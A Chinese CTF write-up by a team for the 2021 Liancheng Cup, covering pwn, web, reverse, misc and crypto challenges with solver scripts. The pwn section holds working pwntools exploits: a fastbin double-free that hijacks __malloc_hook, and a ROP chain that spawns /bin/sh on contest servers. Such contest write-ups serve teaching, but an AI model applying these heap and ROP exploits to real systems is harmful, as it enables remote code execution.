莲城杯

阅读数: 次 2021-10-12

字数统计: 4k字 | 阅读时长: 22分

莲城杯

[TOC]

A1igNed战队莲城杯wp

排名：14

pwn

free_free_free

libc为2.23_11.3

root@ubuntu:/.../free_free_free的附件# checksec free_free_free
[*] '/.../free_free_free的附件/free_free_free'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开

只有add和free

unsigned __int64 add()
{
  int i; // [rsp+8h] [rbp-18h]
  int size; // [rsp+Ch] [rbp-14h]
  void *ptr; // [rsp+10h] [rbp-10h]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  for ( i = 0; chunk_ptr[i]; ++i )
    ;
  puts("size> ");
  size = read_num();
  if ( size < 0 || size > 0x7F )
  {
    puts("size error");
  }
  else
  {
    ptr = malloc(size);
    chunk_ptr[i] = ptr;
    puts("message> ");
    read(0, ptr, (unsigned int)size);
  }
  return __readfsqword(0x28u) ^ v4;
}

add中不限制堆块个数，限制了大小

unsigned __int64 free_()
{
  int v1; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("idx> ");
  v1 = read_num();
  free((void *)chunk_ptr[v1]);
  puts("Now chunk is freed");
  return __readfsqword(0x28u) ^ v2;
}

free后指针没有置零，可以进行fastbin attack，double free

具体思路在脚本注释中

#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "free_free_free"

ip = "183.129.189.60"
port =10023
# libc
local_libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
remote_libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def add(idx,size,payload):
    io.recvuntil(b"> ")
    io.sendline(b'1')
    io.recvuntil(b"size> ")
    io.sendline(str(size).encode())
    io.recvuntil(b"message> ")
    io.send(payload)

def free(idx):
    io.recvuntil(b"> ")
    io.sendline(b'2')
    io.recvuntil(b"idx> ")
    io.sendline(str(idx).encode())

def pwn():
	# 伪造堆块绕过检查
    add(0,0x10,p64(0)+p64(0x81))
    add(1,0x60, p64(0)*11+p64(0x31)) #0 
    add(2,0x70,p64(0)*3+p64(0x61))  #1
    add(3, 0x70, b'b')#2
    add(4, 0x60, b'aaa')
    add(5, 0x70, b'b')#3
    add(10,0x70,b'bbb')
	# 提前释放一个0x70的堆块，为了申请到stdout附近修改_IO_write_base来泄露libc
    free(1)
    # 造成doublefree 申请到0x70堆块上方修改size，再次free后进入unsorted bin
    # 获得残留指针
    free(3)
    free(2)
    free(3)
    # 申请到0x70上方，修改size为0x91，free掉
    add(6,0x70,b'\x10')
    add(7,0x70,b'\x30')
    add(8,0x70,b'\x10')
    add(9,0x70,p64(0)+p64(0x91))
    free(1)
    # 申请0x7f(实际会申请出0x91大小的堆块)，修改fd指针指向stdout-0x43处(绕过size检查)
    add(10, 0x7f, b'\xdd\x45')
    free(10)
    # 因为add中的idx没啥用，后面都随便写了
    add(99,0x70,p64(0)+p64(0x71))
    # 申请两次，申请到stdout附近(1/16的概率)，泄露出libc
    add(11,0x61,b'b')
    add(11,0x60,b'\x00'*(0x33)+p64(0xfbad1800)+p64(0)*3+b'\x88')
    io.recvline()
    _IO_2_1_stdin_=u64(io.recv(6).ljust(8,b'\x00'))
    libcbase=_IO_2_1_stdin_-libc.symbols['_IO_2_1_stdin_']
    success("_IO_2_1_stdin_:"+hex(_IO_2_1_stdin_))
    success("libcbase:"+hex(libcbase))
    free_hook=libcbase+libc.symbols['__free_hook']
    malloc_hook=libcbase+libc.symbols['__malloc_hook']
    # 下面就是申请到__malloc_hook附近，写入one_gadget
    add(99,0x60,b'bbb')
    add(99,0x60,b'ddd')
    add(99,0x60,b'ccc')
    free(15)
    free(16)
    free(15)
    add(99,0x60,p64(malloc_hook-0x23))
    add(99,0x60,b'c')
    add(99,0x60,p64(malloc_hook-0x23))
    ogg=onegadget[3]+libcbase
    add(99,0x60,b'\x00'*(0x13)+p64(ogg))
    io.recvuntil(b"> ")
    io.sendline(b'1')
    io.recvuntil(b"size> ")
    io.sendline(str(1).encode())
    # b(0x00000000000009E0)


if __name__ == '__main__':
    global io
    flag = 100
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                onegadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
            else:
                io = remote(ip, port)
                libc = remote_libc
                onegadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
            pwn()
            io.interactive()
            flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

pwn10

__int64 __fastcall shell(__int64 a1, int a2, int a3, int a4, int a5, int a6)
{
  int v6; // edx
  int v7; // ecx
  int v8; // er8
  int v9; // er9
  char v11[112]; // [rsp+0h] [rbp-70h] BYREF

  printf((unsigned int)"name:", a2, a3, a4, a5, a6, v11[0]);
  gets(name);
  func(v11);
  return printf((unsigned int)"your name: %s\n", (unsigned int)v11, v6, v7, v8, v9, v11[0]);
}

gets可以无限输入，不过name不在栈上

往下看func(v11)

__int64 __fastcall func(char *a1)
{
  unsigned __int64 v1; // rdi
  __int64 result; // rax

  puts("search it ~");
  *(_QWORD *)a1 = name[0];
  *((_QWORD *)a1 + 511) = name[511];
  v1 = (unsigned __int64)(a1 + 8) & 0xFFFFFFFFFFFFFFF8LL;
  result = (((_DWORD)a1 - (_DWORD)v1 + 0x1000) & 0xFFFFFFF8) >> 3;
  qmemcpy((void *)v1, (const void *)((char *)name - &a1[-v1]), 8LL * (unsigned int)result);
  return result;
}

qmemcpy(v1,…,….)

v1又和a1有关，a1即为外面的v11

v11是一个字符数组，存在溢出，带几个地址进去，发现qmemcpy上面的一堆没啥影响

而程序又是静态链接，直接用ropchain生成rop链

ROPgadget –binary pwn10 –ropchain

#!/usr/bin/env python3
# coding=utf-8
from pwn import *
from struct import pack
# from z3 import *
arch = "amd64"
filename = "pwn10"

ip = "183.129.189.60"
port =10016
# libc
# libc
# local_libc = ELF("")
# remote_libc = ELF("")
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")


def pwn():
    # Padding goes here
    p = b'a'*(0x78)

    p += pack(b'<Q', 0x0000000000401807)  # pop rsi ; ret
    p += pack(b'<Q', 0x00000000006ca080)  # @ .data
    p += pack(b'<Q', 0x000000000041f884)  # pop rax ; ret
    p += b'/bin//sh'
    p += pack(b'<Q', 0x0000000000474821)  # mov qword ptr [rsi], rax ; ret
    p += pack(b'<Q', 0x0000000000401807)  # pop rsi ; ret
    p += pack(b'<Q', 0x00000000006ca088)  # @ .data + 8
    p += pack(b'<Q', 0x00000000004264df)  # xor rax, rax ; ret
    p += pack(b'<Q', 0x0000000000474821)  # mov qword ptr [rsi], rax ; ret
    p += pack(b'<Q', 0x00000000004016e6)  # pop rdi ; ret
    p += pack(b'<Q', 0x00000000006ca080)  # @ .data
    p += pack(b'<Q', 0x0000000000401807)  # pop rsi ; ret
    p += pack(b'<Q', 0x00000000006ca088)  # @ .data + 8
    p += pack(b'<Q', 0x0000000000442d16)  # pop rdx ; ret
    p += pack(b'<Q', 0x00000000006ca088)  # @ .data + 8
    p += pack(b'<Q', 0x00000000004264df)  # xor rax, rax ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x0000000000466e60)  # add rax, 1 ; ret
    p += pack(b'<Q', 0x00000000004003da)  # syscall
    io.recv()
    io.sendline(p)

    # b()
    return 1


if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                # libc = local_libc
                # ld = local_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                # libc = remote_libc
                # ld = remote_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            if (pwn() == 0):
                flag -= 1
                continue
            else:
                io.interactive()
                flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

web

Easy_go

gob序列化储存结构体

package main

import (
	"encoding/gob"
	"fmt"
	"os"
)

type person struct{ Name string }

func main() {
	file, err := os.Create("./ff")
	if err != nil {
		fmt.Println(err)
	}
	person := person{Name: "You_Got_It"}
	enc := gob.NewEncoder(file)
	err2 := enc.Encode(person)
	fmt.Println(err2)
}

上传生成文件，获得flag

Minesweepe

js游戏题，更改地雷数量，点三局就成。

re

readme

在start函数找到主函数。发现不能正常用ida，f5。发现存在两处花指令，直接patch 两处的E8就可以正常f5了

读取一个固定的前16字节，然后用输入的前4个字节替换，然后去哈希作为key去解密。爆破前四个字节，然后判断解密出来前四个字节是否存在。然后里面再下一步，将哈希调用的转为字符，然后与刚才得到的16个字节异或，然后前16个字符作为key调用了一个魔改的TEA。最后得到另一部分flag

import hashlib
from Crypto.Util.number import *
from Crypto.Cipher import AES
key=[      0x66, 0x6C, 0x61, 0x67, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00,
  0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00]
enc=[  0x5E, 0xE6, 0x1B, 0x1B, 0xF4, 0xC9, 0x4A, 0x44, 0xFF, 0xCF,
  0x8F, 0x3D, 0x76, 0xAF, 0x48, 0x78]

# for i1 in range(0x20,0x7f):
#     for i2 in range(0x20, 0x7f):
#         for i3 in range(0x20, 0x7f):
#             for i4 in range(0x20, 0x7f):
#                 key = [0x66, 0x6C, 0x61, 0x67, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00,
#                        0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00]
#                 key[0]=i1
#                 key[1] = i2
#                 key[2] = i3
#                 key[3] = i4
#                 key=bytearray(key)
#                 keyy=long_to_bytes(int(hashlib.md5(key).hexdigest(),16))
#                 if len(keyy)!=16:
#                     continue
#                 ae = AES.new(keyy, AES.MODE_ECB)
#                 m=ae.decrypt(bytearray(enc))
#                 kkk=bytearray([key[0],key[1],key[2],key[3]])
#                 print(kkk)
#                 if kkk in m:
#                     print(m)
#                     exit()
#b'Y0U_Are_G00d_4t_'
s='51E75E0BA432428EA1D52522C9B4A9B0'

ss='Y0U_Are_G00d_4t_0000000000000000'
for i in range(0,len(s)//2):
    print(hex(ord(s[i])^ord(ss[i])),end=',')


#
from ctypes import c_uint64 as uint64
from struct import pack, unpack
def tea_encrypt(plaintext, key, delta=0xDEADBEEF):
    '''
    Encrypt a plaintext using TEA algorithm.
    plaintext: 64 bits length bytes-like object.
    key: 128 bits length bytes-like object.
    Return a 64 bits length bytes object.
    '''

    v0, v1 = map(uint64, unpack('<2Q', plaintext))
    print(hex(v0.value),hex(v1.value))
    k0, k1 = map(uint64, unpack('<2Q', key))
    print(hex(k0.value),hex(k1.value))
    sm, delta = uint64(0), uint64(delta)

    for i in range(16):
        sm.value += delta.value
        v0.value += ((v1.value << 4) + k0.value)  ^ ((v1.value >> 6) + sm.value)
        v1.value += ((v0.value << 4) + k1.value)  ^ ((v0.value >> 6) + sm.value)

    return pack('>2Q', v0.value, v1.value)
# print(bytearray([ 0x03, 0x03, 0x04, 0x03, 0x04, 0x75, 0x00, 0x70,  0x02, 0x70, 0x08, 0x70, 0x05, 0x73, 0x08, 0x72]),bytearray([70 ,0 ,75 ,4 ,3 ,4, 3 ,3 , 72 ,8 ,73 ,5 ,70 ,8, 70 ,2]))

# print(tea_encrypt(bytearray([ 0x03, 0x03, 0x04, 0x03, 0x04, 0x75, 0x00, 0x70,  0x02, 0x70, 0x08, 0x70, 0x05, 0x73, 0x08, 0x72]),bytearray([0x6C, 0x01, 0x10, 0x68, 0x74, 0x37, 0x55, 0x1D, 0x06, 0x04,
#   0x03, 0x56, 0x6B, 0x06, 0x4C, 0x1A])).hex())

def tea_decrypt(ciphertext, key, delta=0xDEADBEEF):
    '''
    Decrypt a ciphertext using TEA algorithm.
    ciphertext: 64 bits length bytes-like object.
    key: 128 bits length bytes-like object.
    Return a 64 bits length bytes object.
    '''
    v0, v1 = map(uint64, unpack('>2Q', ciphertext))
    print(hex(v0.value), hex(v1.value))
    k0, k1 = map(uint64, unpack('<2Q', key))
    print(hex(k0.value), hex(k1.value))
    sm, delta = uint64(delta*16), uint64(delta)
    for i in range(16):
        v1.value -= ((v0.value << 4) + k1.value)  ^ ((v0.value >> 6) + sm.value)
        v0.value -= ((v1.value << 4) + k0.value)  ^ ((v1.value >> 6) + sm.value)
        sm.value -= delta.value
    return pack('>2Q', v0.value, v1.value)
print(tea_decrypt(long_to_bytes(0x548C8EBC95604331F36EC9737853E3E4),bytearray([0x6C, 0x01, 0x10, 0x68, 0x74, 0x37, 0x55, 0x1D, 0x06, 0x04,
  0x03, 0x56, 0x6B, 0x06, 0x4C, 0x1A])).hex())
dd=long_to_bytes(0x135432504000576d105c2c501e667344)
s='A1D52522C9B4A9B0'
for i in range(16):
    print(chr(ord(s[i])^dd[i]),end='')
#Rever5e_Send__1t

#Y0U_Are_G00d_4t_Rever5e_Send__1t

rust

运行，发现代码很麻，调试也运行不起来，然后下面，发现是rc4，key也有

尝试拿去解密。

from Crypto.Cipher import ARC4
key=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
enc=[ 0xDE, 0xA5, 0x70, 0x9D, 0x74, 0xD0, 0x20, 0xA9, 0x60, 0xE8,
  0xA5, 0xF7, 0x3F, 0xE9, 0x1E, 0x2A, 0xB0, 0x45, 0xB5, 0x39,
  0xC1, 0x80, 0x26, 0xDF, 0xB7, 0xA7, 0x94, 0xE0, 0x9B, 0x03,
  0xD2, 0x3A]
ar=ARC4.new(bytearray(key) )
print(ar.decrypt(bytearray(enc)))
#b'790d329ef321144ec44f37d18919b418'

LongTime

算法优化，时间浪费在sleep和大量的v1循环中，易观察v4的值24组循环依次，复制源码在循环处加个%24即可。

table='0123456789abcdef'
v1=1
flag=''
for i in range(32):
    v2=0
    v5=1
    v4=0
    for k in range(v1%24): #循环v1次 v1是 5的i次方  #打印一下v4和v5发现是24组一循环 直接模24优化即可
        v3=(v4+v5)%16
        v4=v5
        v5=v3
    print(v4)
    v8=v1
    flag+=table[v4]
    v1=i+4*v8+1
print(flag)
15f559713195b57dd1f9b91d3df55971

misc

Bit map

bmp文件，添加.bmp还是无法查看图片

010打开

根据计算方式可知，数据一共是1080054-54字节，然后因为32位深，需要除以4.高度为-300，得出宽度900

得到图片上面写了R G B，那么还有一个颜色就是A透明通道，用gimp打开切换为RGBA即可看到base64，解码为flag，高度-300记得换成300

midi player

下载里面的mid，然后010打开，往下拉的时候发现f l a g，手撸下来正好也是flag没毛病

flag{Th3_M1D1_SteGh1d3_is_T0_1asy}

解密看看

题目叫解密看看，猜测有密码，估计在内存里，先用passware kit一把梭，梭出来一个开机密码为passwd123

然后用DG打开

打开虚拟磁盘文件，然后恢复文件

在他的document文件夹下发现hint，说是rabbit的密码。

那么rabbit是对称加密，对称加密开头都是U2F，直接010搜

Rabbit解密即可

秘钥passwd123

crypto

\1. randomCrypto：

没啥好说的，单字节异或，直接爆破a就行了，找到可读flag字符串

s=’11011000 11110000 11000100 11011100 10101100 11001000 110011000 11001100 110001100 110011100 110001000 11010100 110011100 110100100 11000100 110100100 11001000 110010100 110011100 110011000 110001000 110001000 110001100 11001100 110000100 11010100 110010000 110000100 11010000 110010100 11000100 110100100 110010000 110010000 110000000 11001000 110000000 10110100’

s=s.split(‘ ‘)

for a in range(65,255):

f=’’

for i in s:

jj=i[:-2]

f+=chr(int(jj,2)^a)

if ‘flag’ in f:

print(f)

#flag{b6c372e79a9b576223c1e41d5a9440b0}

\2. Mt19937

这个题刚开始一看还以为和以前做的32位的mt19937一样，结果拿来一梭，根本不对。

于是去网上翻C++64位mt19937的源码，网上也能找到一些源码https://github.com/lineplay/mt19937_64_cs/blob/master/mt19937_64.cs

实际上实现和32位的异曲同工，当然如果要逆也是一样，直接尝试搜索有没有现成的轮子https://github.com/oToToT/PRNGP/blob/main/mt19937_64/predict.py

不说和题目完全相同，只能说是一模一样，利用这里的脚本可以实现预测，原理和32类似，而且也只需要312个64比特的。

来看具体的，首先flag随机产生的，与之前的无关。而pop函数才是细节，flag小于999，可以爆破（bushi,一个数组pop出对应下标元素，然后数组也会移除，所以可以通过前后的来查找丢失了哪个元素，最后就得到flag了。

from typing import List

class mt19937_64:

def init(self):

self._n = 312

self._i = 0

self._state = [0] * self._n

def _untemper(self, value: int) -> int:

value ^= value >> 43

value ^= (value << 37) & 0xfff7eee000000000

_value = value

for i in range(64):

value = _value ^ ((value << 17) & 0x71d67fffeda60000)

value ^= (value >> 29) & 0x5555555555555555

return value

def from_output(self, output: List[int]) -> None:

assert len(output) >= self._n

output = output[:self._n]

self._state = list(map(self._untemper, output))

def random(self) -> int:

j = (self._i + 1) % self._n

mask = (1 << 31) - 1

inv_mask = (1 << 64) - 1 - mask

yp = (self._state[self._i] & inv_mask) | (self._state[j] & mask)

k = (self._i + 156) % self._n

self._state[self._i] = self._state[k] ^ (yp >> 1) ^ (

0xb5026f5aa96619e9 * (yp & 1))

z = self._state[self._i] ^ (

(self._state[self._i] >> 29) & 0x5555555555555555)

self._i = j

z ^= (z << 17) & 0x71d67fffeda60000

z ^= (z << 37) & 0xfff7eee000000000

return z ^ (z >> 43)

from hashlib import *

f=eval(open(r’D:\桌面\outputs_374.txt’,’r’).read())

pre=mt19937_64()

pre.from_output(f[:312])

for rand in f[312:]:

temp=pre.random()

if rand!=temp:

print(rand)

flag= b’DASCTF{‘+md5(str(temp).encode()).hexdigest().encode()+b’}’

print(flag)

break

else:

print(‘True’)

-------------本文结束感谢您的阅读-------------

A1igNed战队 莲城杯wp

pwn